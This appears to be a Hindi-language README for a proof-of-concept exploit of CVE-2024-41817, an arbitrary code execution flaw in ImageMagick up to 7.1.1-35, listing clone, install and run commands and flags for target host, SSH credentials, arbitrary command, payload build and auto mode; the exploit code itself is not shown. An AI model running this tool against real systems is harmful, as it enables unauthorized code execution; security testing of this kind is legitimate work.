
CVE-2024-41817 POC ImageMagick <= 7.1.1-35 मनमाना कोड निष्पादन (Arbitrary Code Execution)
ImageMagick संस्करण <= 7.1.1-35 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट, जो दुर्भावनापूर्ण XML प्रतिनिधिमंडल के माध्यम से मनमाना कोड निष्पादन की अनुमति देता है।
यह एक्सप्लॉइट ImageMagick में एक भेद्यता का लाभ उठाता है जो विशेष रूप से तैयार की गई लाइब्रेरियों के माध्यम से मनमाना कोड निष्पादन की अनुमति देता है। स्क्रिप्ट निम्न कार्य कर सकती है:
git clone https://github.com/Dxsk/CVE-2024-41817-poc/
cd CVE-2024-41817-poc
pip install -r requirements.txt
python3 exploit.py -H <target> -p <port> -u <user> -P <password> -d
python3 exploit.py -c "command" -B
python3 exploit.py -c "command" -H <target> -p <port> -u <user> -P <password> -A
-c, --command: निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: "id")-H, --host: लक्ष्य होस्ट-p, --port: SSH पोर्ट (डिफ़ॉल्ट: 22)-u, --username: SSH उपयोगकर्ता नाम-P, --password: SSH पासवर्ड-d, --detection: यदि ImageMagick भेद्य है तो स्वतः पता लगाएं-B, --build: केवल पेलोड बनाएं-A, --auto: पूर्ण ऑटो मोड-v, --verbose: विस्तृत आउटपुटयह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन्हीं प्रणालियों पर करें जिनके परीक्षण की अनुमति आपके पास है।